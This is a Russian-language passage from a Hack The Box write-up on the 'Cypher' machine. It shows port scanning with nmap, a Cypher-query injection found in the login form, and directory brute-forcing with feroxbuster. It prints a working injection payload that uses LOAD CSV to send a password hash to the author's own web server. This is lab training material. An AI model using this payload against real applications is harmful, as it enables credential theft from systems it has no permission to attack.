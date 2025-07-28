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Наша цель — получение прав суперпользователя на машине Cypher с учебной площадки Hack The Box. Уровень сложности задания — средний.
warning
Подключаться к машинам с HTB рекомендуется с применением средств анонимизации и виртуализации. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
Разведка
Сканирование портов
Добавляем IP-адрес машины в
/:
10.10.11.57 cypher.htb
И запускаем сканирование портов.
Справка: сканирование портов
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.
Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '' ',' | sed s/,$//)nmap -p$ports -A $1
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция
-A).
Сканер нашел два открытых порта:
- 22 — служба OpenSSH 9.6p1;
- 80 — веб‑сервер Nginx 1.24.0.
По отчету Nmap видно, что веб‑сервер выполняет редирект на сайт
http://. Там нас встретит сайт с графом и ссылкой на страницу авторизации.
Точка входа
Я попробовал вставить в форму авторизации базовую нагрузку, которая бы помогла обойти авторизацию, если бы сработала инъекция
admin' . Однако получаем огромный текст ошибки.
Удобнее просмотреть текст в Burp History. Нам отображается часть запроса на языке Cypher, который используется на сервере.
Про Cypher-инъекции я уже писал в одном из райтапов. По запросу видно, что хеш пароля возвращается как значение
h.. Выполним инъекцию и эксфильтруем на свой веб‑сервер значение хеша. Сам сервер создаем командой
python3 .
admin' OR 1=1 LOAD CSV FROM 'http://10.10.16.73:8000/?value='+h.value AS hash Return ''//
Попытки пробрутить хеш ни к чему не привели, поэтому попытаемся найти еще что‑нибудь интересное.
Точка опоры
Попробуем перебрать каталоги и файлы при помощи feroxbuster.
Справка: сканирование веба c feroxbuster
Одно из первых действий при тестировании безопасности веб‑приложения — это сканирование методом перебора каталогов, чтобы найти скрытую информацию и недоступные обычным посетителям функции. Для этого можно использовать программы вроде dirsearch, DIRB или ffuf. Я предпочитаю feroxbuster.
При запуске указываем следующие параметры:
-
-u— URL;
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-w— словарь (я использую словари из набора SecLists);
-
-d— глубина сканирования;
-
-t— количество потоков.
Задаем все параметры и запускаем перебор:
feroxbuster -u http://cypher.htb/ -w directory_2.3_medium_lowercase.txt -d 1 -t 128
Среди эндпоинтов есть интересные:
/ и
/. На первом всегда Not Found, а вот каталог
/ не имеет индекс‑файла, и поэтому мы получаем список файлов в каталоге.
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